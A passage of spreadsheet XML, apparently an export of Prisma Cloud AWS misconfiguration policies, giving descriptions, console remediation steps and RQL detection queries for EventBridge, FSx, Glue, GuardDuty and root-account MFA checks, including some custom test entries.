          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-events-eventbus' AND json.rule = Policy does not exist</t>
        </is>
      </c>
      <c r="AA1935" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1935" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1935" t="inlineStr">
        <is>
          <t>PC-AWS-AEB-1174</t>
        </is>
      </c>
      <c r="AD1935" t="b">
        <v>1</v>
      </c>
      <c r="AE1935" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1935" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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5" t="inlineStr">
        <is>
          <t>ec8a9b9b-6706-469e-be0f-f2dd6f0b6f33</t>
        </is>
      </c>
      <c r="AI1935" t="inlineStr">
        <is>
          <t>d2d6e9b9-4c97-4b70-94c4-8864a38bd358</t>
        </is>
      </c>
      <c r="AJ1935" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1935" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1936">
      <c r="A1936" t="inlineStr">
        <is>
          <t>ITSG-33, HITRUST CSF v.11.2.0, CSA CCM v4.0.12, NIST 800-53 Rev 5, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1936" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1936" s="2" t="inlineStr"/>
      <c r="D1936" t="inlineStr"/>
      <c r="E1936" t="inlineStr"/>
      <c r="F1936" t="inlineStr"/>
      <c r="G1936" t="b">
        <v>1</v>
      </c>
      <c r="H19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36" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1936" t="inlineStr">
        <is>
          <t>aws-fsx</t>
        </is>
      </c>
      <c r="K1936" t="inlineStr">
        <is>
          <t>AWS FSx for OpenZFS file systems not configured to copy tags to backups or volumes</t>
        </is>
      </c>
      <c r="L1936" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1936" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1936" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1936" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1936" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1936" t="inlineStr">
        <is>
          <t>BR</t>
        </is>
      </c>
      <c r="R1936" t="inlineStr">
        <is>
          <t>BR-1</t>
        </is>
      </c>
      <c r="S1936" t="inlineStr"/>
      <c r="T1936" t="b">
        <v>0</v>
      </c>
      <c r="U1936" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1936" t="inlineStr">
        <is>
          <t>aws-fsx-file-system</t>
        </is>
      </c>
      <c r="W1936" t="inlineStr">
        <is>
          <t>This policy identifies the AWS FSx for OpenZFS file system is configured to copy tags to backups or volumes.
AWS FSx for OpenZFS is a managed service for deploying and scaling OpenZFS file systems on AWS. Tags make resource identification and management easier, ensuring consistent security policies across file systems. Without copying tags to backups and volumes in AWS FSx for OpenZFS, enforcing consistent access control and tracking sensitive data in these resources becomes challenging.
It is recommended to configure an FSx for the OpenZFS file system to copy tags to backups and volumes.</t>
        </is>
      </c>
      <c r="X1936" t="inlineStr">
        <is>
          <t>To configure an  AWS FSx for OpenZFS file system to copy tags to backups and volumes, perform following actions:
1. Sign in to your AWS account and Open the Amazon FSx console.
2. In the left navigation pane, choose 'File systems', and then choose the FSx for OpenZFS file system that is reported.
3. For 'Actions', choose 'Update tags preferences'. The Update tags preferences dialog box displays.
4. For 'Copy tags to backups', select 'Enabled' to copy tags from the file system to any backup thats taken.
5. For 'Copy tags to volumes', select 'Enabled' to copy tags from the file system to any volume that you create.
6. Choose Update to update the file system with your changes.</t>
        </is>
      </c>
      <c r="Y1936" t="inlineStr"/>
      <c r="Z1936" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-fsx-file-system' AND json.rule = FileSystemType equals "OPENZFS" and Lifecycle equals "AVAILABLE" and (OpenZFSConfiguration.CopyTagsToBackups is false or OpenZFSConfiguration.CopyTagsToVolumes is false )</t>
        </is>
      </c>
      <c r="AA1936" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1936" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1936" t="inlineStr">
        <is>
          <t>PC-AWS-FSX-1258</t>
        </is>
      </c>
      <c r="AD1936" t="b">
        <v>1</v>
      </c>
      <c r="AE1936" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1936" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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36" t="inlineStr">
        <is>
          <t>52395ee4-14cb-475d-a26e-f6926fcfddad</t>
        </is>
      </c>
      <c r="AI1936" t="inlineStr">
        <is>
          <t>d931f2d9-5c6e-4b8b-815a-445bc14c493a</t>
        </is>
      </c>
      <c r="AJ1936" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1936" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1937">
      <c r="A1937" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B1937" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1937" s="2" t="inlineStr"/>
      <c r="D1937" t="inlineStr"/>
      <c r="E1937" t="inlineStr"/>
      <c r="F1937" t="inlineStr"/>
      <c r="G1937" t="b">
        <v>1</v>
      </c>
      <c r="H19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37" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1937" t="inlineStr">
        <is>
          <t>aws-glue</t>
        </is>
      </c>
      <c r="K1937" t="inlineStr">
        <is>
          <t>AWS Glue Job using the shadow resource bucket for script location</t>
        </is>
      </c>
      <c r="L1937" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1937" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1937" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1937" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1937" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1937" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R1937" t="inlineStr">
        <is>
          <t>Information Systems Acquisition and Development</t>
        </is>
      </c>
      <c r="S1937" t="inlineStr"/>
      <c r="T1937" t="b">
        <v>0</v>
      </c>
      <c r="U1937" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1937" t="inlineStr">
        <is>
          <t>aws-glue-job</t>
        </is>
      </c>
      <c r="W1937" t="inlineStr">
        <is>
          <t>This policy identifies that the AWS Glue Job using the bucket for script location is not managed from the current location. This could potentially be using the shadow resource bucket for script location.
A shadow resource bucket is an unauthorized S3 bucket posing security risks. AWS Glue is a service utilized to automate the extraction, transformation, and loading (ETL) processes, streamlining data preparation for analytics and machine learning. When a job is created using the Visual ETL tool, Glue automatically creates an S3 bucket with a predictable name pattern 'aws-glue-assets-accountid-region'. An attacker could create the S3 bucket in any region before the victim uses Glue ETL, causing the victims Glue service to write files to the attacker-controlled bucket. This vulnerability allows an attacker to inject any code into the Glue job of the victim, resulting in remote code execution (RCE).
It is recommended to verify the expected bucket owner and update the AWS Glue jobs script location and enforce the aws:ResourceAccount condition in the policy of the AWS Glue Job to check that the AWS account ID of the S3 bucket used by AWS Glue Job according to your business requirements.</t>
        </is>
      </c>
      <c r="X1937" t="inlineStr">
        <is>
          <t>To update the script location for an AWS Glue Job:
1. Sign in to the AWS Management Console and open the AWS Glue Studio console at https://console.aws.amazon.com/gluestudio/.
2. In the navigation pane, choose 'ETL jobs'.
3. Select the desired AWS Glue Job and choose 'Edit Job' from the 'Actions' drop-down.
4. In the 'Job Details' window, under 'Advanced properties', verify that the 'Script path' and 'Script filename' are authorized and managed according to your business requirements.
5. Move the required script to a new S3 bucket as per your requirements.
6. In the AWS Glue Studio console, go to the 'Job details' tab and update the 'Script filename' and 'Script path' parameters to reflect the new S3 location.
7. Choose 'Save'.</t>
        </is>
      </c>
      <c r="Y1937" t="inlineStr"/>
      <c r="Z1937" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-glue-job' AND json.rule = Command.BucketName exists and Command.BucketName contains "aws-glue-assets-" as X; config from cloud.resource where api.name = 'aws-s3api-get-bucket-acl' AND json.rule = bucketName contains "aws-glue-assets-" as Y; filter 'not ($.X.Command.BucketName equals $.Y.bucketName)' ; show X;</t>
        </is>
      </c>
      <c r="AA1937" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1937" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1937" t="inlineStr">
        <is>
          <t>PC-AWS-GLU-1299</t>
        </is>
      </c>
      <c r="AD1937" t="b">
        <v>1</v>
      </c>
      <c r="AE1937" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1937" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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37" t="inlineStr">
        <is>
          <t>c7c6a60f-66f5-4961-8dc2-df4be4edad6d</t>
        </is>
      </c>
      <c r="AI1937" t="inlineStr">
        <is>
          <t>b7caa6d9-b507-4c7b-a96a-aac6ba60a34d</t>
        </is>
      </c>
      <c r="AJ1937" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1937" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1938">
      <c r="A1938" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B1938" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1938" s="2" t="inlineStr"/>
      <c r="D1938" t="inlineStr"/>
      <c r="E1938" t="inlineStr"/>
      <c r="F1938" t="inlineStr"/>
      <c r="G1938" t="b">
        <v>1</v>
      </c>
      <c r="H19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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1938" t="inlineStr">
        <is>
          <t>aws-guardduty</t>
        </is>
      </c>
      <c r="K1938" t="inlineStr">
        <is>
          <t>AWS GuardDuty detector is not enabled</t>
        </is>
      </c>
      <c r="L1938" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1938" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1938" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1938" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1938" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1938" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R1938" t="inlineStr">
        <is>
          <t>Information Systems Acquisition and Development</t>
        </is>
      </c>
      <c r="S1938" t="inlineStr"/>
      <c r="T1938" t="b">
        <v>0</v>
      </c>
      <c r="U1938" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1938" t="inlineStr">
        <is>
          <t>aws-guardduty-detector</t>
        </is>
      </c>
      <c r="W1938" t="inlineStr">
        <is>
          <t>This policy identifies the AWS GuardDuty detector that is not enabled in specific regions.
GuardDuty identifies potential security threats in the AWS environment by analyzing data collected from various sources. The GuardDuty detector is the entity within the GuardDuty service that does this analysis. Failure to enable GuardDuty increases the risk of undetected threats and vulnerabilities which could lead to compromises in the AWS environment.
It is recommended to enable GuardDuty detectors in all regions to reduce the risk of security breaches.</t>
        </is>
      </c>
      <c r="X1938" t="inlineStr">
        <is>
          <t>To enable Amazon GuardDuty in the region,
1. Log in to the AWS console.
2. In the console, select the specific region from the region drop-down menu located at the top right corner for which the alert has been generated.
3. Navigate to service 'Amazon Gaurdduty' from the 'Services' Menu.
4. Choose 'Get Started'.
5. Choose 'Enable GuardDuty' to enable on a specific region.
To re-enable Amazon GuardDuty after suspending,
1. Log in to the AWS console.
2. In the console, select the specific region from the region drop-down menu located at the top right corner for which the alert has been generated.
3. Navigate to service 'Amazon Gaurdduty' from the 'Services' Menu.
4. In the navigation pane, choose 'Settings'.
5. Choose 'Re-enable GuardDuty' to re-enable on a specific region. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-guardduty-detector-is-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-guardduty-detector-is-enabled</t>
        </is>
      </c>
      <c r="Y1938" t="inlineStr"/>
      <c r="Z1938" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-guardduty-detector' AND json.rule = status does not equal ENABLED
{"category":"General","resourceTypes":["aws_guardduty_detector"]}</t>
        </is>
      </c>
      <c r="AA1938" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1938" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1938" t="inlineStr">
        <is>
          <t>PC-AWS-GD-1139-CKV_AWS_238</t>
        </is>
      </c>
      <c r="AD1938" t="b">
        <v>1</v>
      </c>
      <c r="AE1938" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1938" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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8" t="inlineStr">
        <is>
          <t>4c78b025-0101-42d4-8028-3585a62c66f9</t>
        </is>
      </c>
      <c r="AI1938" t="inlineStr">
        <is>
          <t>2ba509d8-fab8-4585-a89b-2f2ddee1aaf5</t>
        </is>
      </c>
      <c r="AJ1938" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1938" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1939">
      <c r="A1939" t="inlineStr">
        <is>
          <t>cku-compliance-standard-02</t>
        </is>
      </c>
      <c r="B1939" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1939" s="2" t="inlineStr"/>
      <c r="D1939" t="inlineStr"/>
      <c r="E1939" t="inlineStr"/>
      <c r="F1939" t="inlineStr"/>
      <c r="G1939" t="b">
        <v>0</v>
      </c>
      <c r="H19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39" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1939" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1939" t="inlineStr">
        <is>
          <t>cku-policy-02</t>
        </is>
      </c>
      <c r="L1939" t="inlineStr"/>
      <c r="M1939" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1939" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1939" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1939" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1939" t="inlineStr">
        <is>
          <t>cku-compliance-requirement-02</t>
        </is>
      </c>
      <c r="R1939" t="inlineStr">
        <is>
          <t>cku-compliance-section-02</t>
        </is>
      </c>
      <c r="S1939" t="inlineStr">
        <is>
          <t>iam,cku,aws</t>
        </is>
      </c>
      <c r="T1939" t="b">
        <v>0</v>
      </c>
      <c r="U1939" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1939" t="inlineStr">
        <is>
          <t>aws-iam-get-account-password-policy</t>
        </is>
      </c>
      <c r="W1939" t="inlineStr">
        <is>
          <t>Corey's testing</t>
        </is>
      </c>
      <c r="X1939" t="inlineStr">
        <is>
          <t>Testing</t>
        </is>
      </c>
      <c r="Y1939" t="inlineStr"/>
      <c r="Z1939" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-iam-get-account-password-policy' AND json.rule='isDefaultPolicy is true or requireNumbers is false or requireNumbers does not exist'</t>
        </is>
      </c>
      <c r="AA1939" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB1939" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1939" t="inlineStr"/>
      <c r="AD1939" t="b">
        <v>0</v>
      </c>
      <c r="AE1939" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1939" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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39" t="inlineStr">
        <is>
          <t>e003e335-d71c-423a-ad75-03fc852c623f</t>
        </is>
      </c>
      <c r="AI1939" t="inlineStr">
        <is>
          <t>4d5d4395-0209-45c1-8924-284ca78a2145</t>
        </is>
      </c>
      <c r="AJ1939" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1939" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1940">
      <c r="A1940" t="inlineStr">
        <is>
          <t>ISO 27001:2013, NIST 800-53 Rev4, Demo_Daryl ACSC Information Security Manual (ISM), GDPR, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v3.0.1, Demo_Daryl ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NIST 800-53 Rev4, CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, Demo_Daryl ACSC Information Security Manual (ISM), NIST 800-53 Rev4, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, CHC HITRUST CSF v.9.6.0, jbrox - GDPR, NIST CSF, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, APRA (CPS 234) Information Security, CSA CCM v3.0.1, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, CDC NIST 800-53 Rev4, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v6.3 [Deprecated], kfirdaus AWS Account-CS, MTSBv2_AWS, ACSC Information Security Manual (ISM), CSA CCM v3.0.1, MITRE ATT&amp;CK v6.3 [Deprecated], CDC NIST 800-53 Rev4, NIST 800-53 Rev4, SOC 2, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), PCI DSS v3.2.1, kfirdaus AWS Account-CS, Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.3.0 (AWS), Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev 5, Australian Energy Sector Cyber Security Framework (AESCSF), Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.4.0 (AWS), SOC 2, ISO/IEC 27017:2015, kashan ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, kfirdaus AWS Account-CS, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, kashan ACSC Information Security Manual (ISM), MAS TRM 2021, Copy of CIS Controls v8, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v8.2 [Deprecated], NYDFS 23 CRR-NY 500.0, CDC NIST 800-53 Rev4, MLPS 2.0, Risk Management in Technology (RMiT), HITRUST CSF v.9.6.0, MITRE ATT&amp;CK v6.3 [Deprecated], ISO 27001:2013, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, ISO/IEC 27002:2013, CIS Controls v8, CHC HITRUST CSF v.9.6.0, HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST 800-171 Rev1, CIS v1.2.0 (AWS), Australian Cyber Security Centre (ACSC) Essential Eight, APRA (CPS 234) Information Security, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, AWS Well-Architected Framework, HITRUST CSF v.9.6.0, CSA CCM v3.0.1, kfirdaus AWS Account-CS, ISO/IEC 27018:2019, SOC 2, NIST 800-53 Rev4, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, ISO/IEC 27002:2013, NIST SP 800-172, CSA CCM v3.0.1, PCI DSS v4.0, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, Demo_Daryl ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, NIST 800-53 Rev4, MITRE ATT&amp;CK v6.3 [Deprecated], FFIEC, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM)</t>
        </is>
      </c>
      <c r="B1940" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1940" s="2" t="inlineStr"/>
      <c r="D1940" t="inlineStr"/>
      <c r="E1940" t="inlineStr"/>
      <c r="F1940" t="inlineStr"/>
      <c r="G1940" t="b">
        <v>0</v>
      </c>
      <c r="H19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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1940" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1940" t="inlineStr">
        <is>
          <t>DM_Demo_TEST_4  AWS MFA is not enabled on Root account</t>
        </is>
      </c>
      <c r="L1940" t="inlineStr"/>
      <c r="M1940" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1940" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1940" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1940" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1940" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R1940" t="inlineStr">
        <is>
          <t>ISM-1173</t>
        </is>
      </c>
      <c r="S1940" t="inlineStr">
        <is>
          <t>Custom,CIS</t>
        </is>
      </c>
      <c r="T1940" t="b">
        <v>0</v>
      </c>
      <c r="U1940" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1940" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W1940" t="inlineStr">
        <is>
          <t>This policy identifies root account which has MFA enabled. Root accounts have privileged access to all AWS services. Without MFA, if the root credentials are compromised, unauthorized users will get full access to your account.
NOTE: This policy does not apply to AWS GovCloud Accounts. As you cannot enable an MFA device for AWS GovCloud (US) account root user. For more details refer: https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-console.html</t>
        </is>
      </c>
      <c r="X1940" t="inlineStr">
        <is>
          <t>1. Sign in to the 'AWS Console' using Root credentials.
2. Navigate to the 'IAM' service.
3. On the dashboard, click on 'Activate MFA on your root account', click on 'Manage MFA' and follow the steps to configure MFA for the root account.</t>
        </is>
      </c>
      <c r="Y1940" t="inlineStr"/>
      <c r="Z1940" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-credential-report' AND json.rule = 'user equals "&lt;root_account&gt;" and mfa_active is false and arn does not contain gov:'</t>
        </is>
      </c>
      <c r="AA1940" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB1940" t="inlineStr">
        <is>
          <t>2024-11-19 10:55:32</t>
        </is>
      </c>
      <c r="AC1940" t="inlineStr"/>
      <c r="AD1940" t="b">
        <v>0</v>
      </c>
      <c r="AE1940" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1940" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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0" t="inlineStr">
        <is>
          <t>4bf4eef7-3d9f-48f2-a1ce-fcc7dd28d347</t>
        </is>
      </c>
      <c r="AI1940" t="inlineStr">
        <is>
          <t>478434a1-ff6c-492e-b411-c427c06291d9</t>
        </is>
      </c>
      <c r="AJ1940" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1940" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1941">
      <c r="A1941" t="inlineStr">
        <is>
          <t>Rehan-Zoom-Test-Compliance-Standard</t>
        </is>
      </c>
      <c r="B1941" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1941" s="2" t="inlineStr"/>
      <c r="D1941" t="inlineStr"/>
      <c r="E1941" t="inlineStr"/>
      <c r="F1941" t="inlineStr"/>
      <c r="G1941" t="b">
        <v>0</v>
      </c>
      <c r="H19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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1941" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1941" t="inlineStr">
        <is>
          <t>Zoom Testing - AWS MFA is not enabled on Root account</t>
        </is>
      </c>
      <c r="L1941" t="inlineStr"/>
      <c r="M1941" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1941" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O1941" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1941" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1941" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="R1941" t="inlineStr">
        <is>
          <t>1</t>
        </is>
      </c>
      <c r="S1941" t="inlineStr">
        <is>
          <t>Boehringer tag,Policy Status Review</t>
        </is>
      </c>
      <c r="T1941" t="b">
        <v>0</v>
      </c>
      <c r="U1941" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1941" t="inlineStr">
        <is>
          <t>aws-iam-get-credential-report</t>
        </is>
      </c>
      <c r="W1941" t="inlineStr">
        <is>
          <t>This policy identifies root account which has MFA enabled. Root accounts have privileged access to all AWS services. Without MFA, if the root credentials are compromised, unauthorized users will get full access to your account.
NOTE: This policy does not apply to AWS GovCloud Accounts. As you cannot enable an MFA device for AWS GovCloud (US) account root user. For more details refer: https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-console.html</t>
        </is>
      </c>
      <c r="X1941" t="inlineStr">
        <is>
          <t>1. Sign in to the 'AWS Console' using Root credentials.
2. Navigate to the 'IAM' service.
3. On the dashboard, click on 'Activate MFA on your root account', click on 'Manage MFA' and follow the steps to configure MFA for the root account.</t>
        </is>
      </c>
      <c r="Y1941" t="inlineStr"/>
      <c r="Z1941" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-get-credential-report' AND json.rule = 'user equals "&lt;root_account&gt;" and mfa_active is false and arn does not contain gov:'</t>
        </is>
      </c>
      <c r="AA1941" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB1941" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1941" t="inlineStr"/>
      <c r="AD1941" t="b">
        <v>0</v>
      </c>
      <c r="AE1941" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF1941" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1" t="inlineStr">
        <is>
          <t>6a8bfd8d-d460-4e08-96cd-f9f57cf8b2d2</t>
        </is>
      </c>
      <c r="AI1941" t="inlineStr">
        <is>
          <t>478434a1-ff6c-492e-b411-c427c06291d9</t>
        </is>
      </c>
      <c r="AJ1941" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1941" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1942">
      <c r="A1942" t="inlineStr">
        <is>
